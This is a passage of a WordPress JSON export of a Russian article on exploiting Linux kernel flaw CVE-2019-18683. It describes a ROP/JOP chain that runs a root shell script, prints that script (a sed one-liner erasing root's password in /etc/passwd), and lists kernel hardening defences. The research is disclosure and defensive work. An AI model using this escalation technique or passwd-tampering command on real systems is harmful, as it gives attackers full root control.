\u0444\u0443\u043d\u043a\u0446\u0438\u0438 <code>run_cmd()<\/code> \u0438\u0437 <code>kernel\/reboot.c<\/code> \u0432 \u0440\u0435\u0433\u0438\u0441\u0442\u0440 <code>R15<\/code>. \u0417\u0430\u0442\u0435\u043c \u0432 \u0440\u0435\u0433\u0438\u0441\u0442\u0440 <code>RDI<\/code> \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0430\u0434\u0440\u0435\u0441 \u0441\u0442\u0440\u043e\u043a\u0438 \u0441 shell-\u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u0443\u0434\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0430 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u0441\u0443\u043f\u0435\u0440\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0427\u0435\u0440\u0435\u0437 \u0440\u0435\u0433\u0438\u0441\u0442\u0440 <code>RDI<\/code> \u0434\u0430\u043d\u043d\u044b\u0439 \u0430\u0434\u0440\u0435\u0441 \u0431\u0443\u0434\u0435\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u043d \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <code>run_cmd()<\/code> \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0430. \u0417\u0430\u0442\u0435\u043c \u0432 ROP-\u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e JOP-\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 (Jump-Oriented Programming). \u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u0440\u044b\u0436\u043e\u043a \u043d\u0430 <code>run_cmd()<\/code>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 <code>'\/bin\/sh \/home\/a13x\/pwn'<\/code> \u043e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 <code>\/etc\/passwd<\/code>, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f \u0432\u043e\u0439\u0442\u0438 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u043a\u0430\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c root:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">#!\/bin\/sh # drop root password sed -i '1s\/.*\/root::0:0:root:\\\/root:\\\/bin\\\/bash\/' \/etc\/passwd<\/code><\/pre>\n<p>  <\/p>\n<p>\u0412 \u043a\u043e\u043d\u0446\u0435 ROP-\u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043f\u0440\u044b\u0436\u043e\u043a \u043d\u0430 \u044f\u0434\u0435\u0440\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e <code>__noreturn do_task_dead()<\/code> \u0438\u0437 <code>kernel\/exit.c<\/code>. \u042d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043f\u043e\u0441\u043b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (\u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u044d\u0442\u043e system fixating). \u0412 \u043f\u0440\u043e\u0442\u0438\u0432\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435, \u0435\u0441\u043b\u0438 \u0434\u0430\u043d\u043d\u044b\u0439 \u044f\u0434\u0435\u0440\u043d\u044b\u0439 \u043f\u043e\u0442\u043e\u043a \u043d\u0435 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c, \u043e\u043d \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u043d\u0435\u0436\u0435\u043b\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u043c\u0443 \u043f\u0430\u0434\u0435\u043d\u0438\u044e \u044f\u0434\u0440\u0430.<\/p>\n<p>  <\/p>\n<h2 id=\"vozmozhnye-sredstva-zaschity\">\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b<\/h2>\n<p>  <\/p>\n<p>\u0414\u043b\u044f \u044f\u0434\u0440\u0430 Linux \u0435\u0441\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0437\u0430\u0449\u0438\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u043b\u0438 \u0431\u044b \u043f\u043e\u043c\u0435\u0448\u0430\u0442\u044c \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c \u0447\u0430\u0441\u0442\u044f\u043c \u043c\u043e\u0435\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.<\/p>\n<p>  <\/p>\n<ol>\n<li>\n<p>\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f <code>0<\/code> \u0434\u043b\u044f \u043e\u043f\u0446\u0438\u0438 <code>\/proc\/sys\/vm\/unprivileged_userfaultfd<\/code> \u043f\u043e\u043c\u0435\u0448\u0430\u043b\u0430 \u0431\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u043c\u0443 \u043c\u0435\u0442\u043e\u0434\u0443 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u044f\u0434\u0440\u0430. \u0412 \u044d\u0442\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0434\u043b\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 (\u0431\u0435\u0437 <code>SYS_CAP_PTRACE<\/code>) \u0437\u0430\u043f\u0440\u0435\u0449\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 <code>userfaultfd()<\/code>.<\/p>\n<p>  <\/li>\n<li>\n<p>\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f <code>1<\/code> \u0434\u043b\u044f sysctl <code>kernel.dmesg_restrict<\/code> \u043c\u043e\u0433\u043b\u0430 \u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0443\u0442\u0435\u0447\u043a\u0443 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 \u044f\u0434\u0435\u0440\u043d\u044b\u0439 \u0436\u0443\u0440\u043d\u0430\u043b. \u0414\u0430\u043d\u043d\u0430\u044f \u043e\u043f\u0446\u0438\u044f \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c <code>dmesg<\/code>. \u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u0442\u0435\u043c, \u0434\u0430\u0436\u0435 \u043f\u0440\u0438 <code>kernel.dmesg_restrict = 1<\/code> \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Ubuntu, \u0441\u043e\u0441\u0442\u043e\u044f\u0449\u0438\u0435 \u0432 \u0433\u0440\u0443\u043f\u043f\u0435 <code>adm<\/code>, \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u043c\u043e\u0433\u0443\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u044f\u0434\u0435\u0440\u043d\u044b\u0439 \u0436\u0443\u0440\u043d\u0430\u043b \u0447\u0435\u0440\u0435\u0437 <code>\/var\/log\/syslog<\/code>.<\/p>\n<p>  <\/li>\n<li>\n<p>\u0412 \u043f\u0430\u0442\u0447\u0435 <strong>grsecurity\/PaX<\/strong> \u0434\u043b\u044f \u044f\u0434\u0440\u0430 Linux \u0435\u0441\u0442\u044c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f <code>PAX_RANDKSTACK<\/code>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u0431\u044b \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0443\u0433\u0430\u0434\u044b\u0432\u0430\u0442\u044c \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b <code>vb2_queue<\/code>:   <\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">+config PAX_RANDKSTACK + bool &quot;Randomize kernel stack base&quot; + default y if GRKERNSEC_CONFIG_AUTO &amp;&amp; !(GRKERNSEC_CONFIG_VIRT_HOST &amp;&amp; GRKERNSEC_CONFIG_VIRT_VIRTUALBOX) + depends on X86_TSC &amp;&amp; X86 + help +   By saying Y here the kernel will randomize every task's kernel +   stack on every system call.  This will not only force an attacker +   to guess it but also prevent him from making use of possible +   leaked information about it. + +   Since the kernel stack is a rather scarce resource, randomization +   may cause unexpected stack overflows, therefore you should very +   carefully test your system.  Note that once enabled in the kernel +   configuration, this feature cannot be disabled on a per file basis. +<\/code><\/pre>\n<p>  <\/li>\n<li>\n<p>\u0424\u0443\u043d\u043a\u0446\u0438\u044f <code>PAX_RAP<\/code> \u0438\u0437 \u043f\u0430\u0442\u0447\u0430 <strong>grsecurity\/PaX<\/strong> \u0434\u043b\u044f \u044f\u0434\u0440\u0430 Linux \u043d\u0435 \u0434\u0430\u043b\u0430 \u0431\u044b \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c\u0441\u044f \u043c\u043e\u0435\u0439 ROP\/JOP-\u0446\u0435\u043f\u043e\u0447\u043a\u0435.<\/p>\n<p>  <\/li>\n<li>\n<p>\u041d\u0430\u0434\u0435\u044e\u0441\u044c, \u043e\u0434\u043d\u0430\u0436\u0434\u044b \u0432 \u0431\u0443\u0434\u0443\u0449\u0435\u043c \u0432 \u044f\u0434\u0440\u0435 Linux \u043f\u043e\u044f\u0432\u0438\u0442\u0441\u044f \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0437\u0430\u0449\u0438\u0442\u044b <strong>ARM Memory Tagging Extension (MTE)<\/strong>. \u041f\u043b\u0430\u043d\u0438\u0440\u0443\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u044d\u0442\u043e \u0438\u0437\u0431\u0430\u0432\u0438\u0442 \u044f\u0434\u0440\u043e \u043e\u0442 \u0446\u0435\u043b\u043e\u0433\u043e \u043a\u043b\u0430\u0441\u0441\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u00ab\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0441\u043b\u0435 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f\u00bb (use-after-free).<\/p>\n<p>  <\/li>\n<\/ol>\n<p>  <\/p>\n<p>\u0412\u043e\u0442 \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u044b \u043f\u0440\u043e <a href=\"https:\/\/grsecurity.net\/features\">grsecurity\/PaX<\/a> \u0438 <a href=\"https:\/\/community.arm.com\/developer\/ip-products\/processors\/b\/processors-ip-blog\/posts\/enhancing-memory-safety\">ARM MTE<\/a>.<\/p>\n<p>  <\/p>\n<h2 id=\"zaklyuchenie\">\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/h2>\n<p>  <\/p>\n<p>\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2019-18683\">CVE-2019-18683<\/a>, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0430 \u043f\u0440\u043e\u0442\u043e\u0442\u0438\u043f\u0430 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0438 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0434\u0430\u043d\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0438 \u0431\u044b\u043b\u0438 \u0434\u043b\u044f \u043c\u0435\u043d\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0437\u0430\u0434\u0430\u0447\u0435\u0439. \u041d\u0430\u0434\u0435\u044e\u0441\u044c, \u0432\u0430\u043c \u043f\u043e\u043d\u0440\u0430\u0432\u0438\u043b\u043e\u0441\u044c.<\/p>\n<p>  <\/p>\n<p>\u0425\u043e\u0442\u0435\u043b \u0431\u044b \u043f\u043e\u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u0438\u0442\u044c <a href=\"https:\/\/www.ptsecurity.com\/ww-en\/\">Positive Technologies<\/a> \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u044d\u0442\u0443 \u0440\u0430\u0431\u043e\u0442\u0443.<\/p>\n<\/div>\n<p> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/company\/pt\/blog\/491756\/\"> https:\/\/habr.com\/ru\/company\/pt\/blog\/491756\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"\n<div class=\"post__text post__text-html post__text_v1\" id=\"post-content-body\" data-io-article-url=\"https:\/\/habr.com\/ru\/company\/pt\/blog\/491756\/\">\n<p>\u0412 \u0434\u0430\u043d\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2019-18683\">CVE-2019-18683<\/a> \u0432 \u044f\u0434\u0440\u0435 Linux, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b \u0432 \u043a\u043e\u043d\u0446\u0435 2019 \u0433\u043e\u0434\u0430. \u0423\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 CVE-\u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u043c \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u043c \u043e\u0448\u0438\u0431\u043a\u0430\u043c \u0442\u0438\u043f\u0430 \u00ab\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438\u00bb, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 <code>V4L2<\/code> \u044f\u0434\u0440\u0430 Linux \u043d\u0430 \u043f\u0440\u043e\u0442\u044f\u0436\u0435\u043d\u0438\u0438 \u043f\u044f\u0442\u0438 \u043b\u0435\u0442. \u041f\u044f\u0442\u043d\u0430\u0434\u0446\u0430\u0442\u043e\u0433\u043e \u0444\u0435\u0432\u0440\u0430\u043b\u044f \u044f \u0432\u044b\u0441\u0442\u0443\u043f\u0438\u043b \u0441 \u0434\u043e\u043a\u043b\u0430\u0434\u043e\u043c \u043f\u043e \u0434\u0430\u043d\u043d\u043e\u0439 \u0442\u0435\u043c\u0435 \u043d\u0430 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 <a href=\"https:\/\/www.offensivecon.org\/speakers\/2020\/alexander-popov.html\">OffensiveCon 2020<\/a> (<a href=\"https:\/\/a13xp0p0v.github.io\/img\/CVE-2019-18683.pdf\">\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043f\u0440\u0435\u0437\u0435\u043d\u0442\u0430\u0446\u0438\u044e<\/a>).<\/p>\n<p>  <\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u044f \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u043e \u043e\u0431\u044a\u044f\u0441\u043d\u044e, \u043a\u0430\u043a \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0439 \u043c\u043d\u043e\u0439 \u043f\u0440\u043e\u0442\u043e\u0442\u0438\u043f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 (PoC exploit) \u0434\u043b\u044f \u043c\u0438\u043a\u0440\u043e\u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b <code>x86_64<\/code>. \u0414\u0430\u043d\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0430 \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0442\u043e\u043a\u0430, \u0433\u0434\u0435 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430. \u0412 \u0441\u0442\u0430\u0442\u044c\u0435 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043e, \u043a\u0430\u043a \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f Ubuntu Server 18.04 \u043e\u0431\u0445\u043e\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b: <code>KASLR<\/code>, <code>SMEP<\/code> \u0438 <code>SMAP<\/code>.<\/p>\n<p>  <\/p>\n<p>\u041d\u0430\u0447\u043d\u0435\u043c \u0441 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.<br \/>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/webt\/vt\/lj\/fi\/vtljfid4eunc_37k0zverpugslg.jpeg\"><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-300012","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/300012","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=300012"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/300012\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=300012"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=300012"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=300012"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}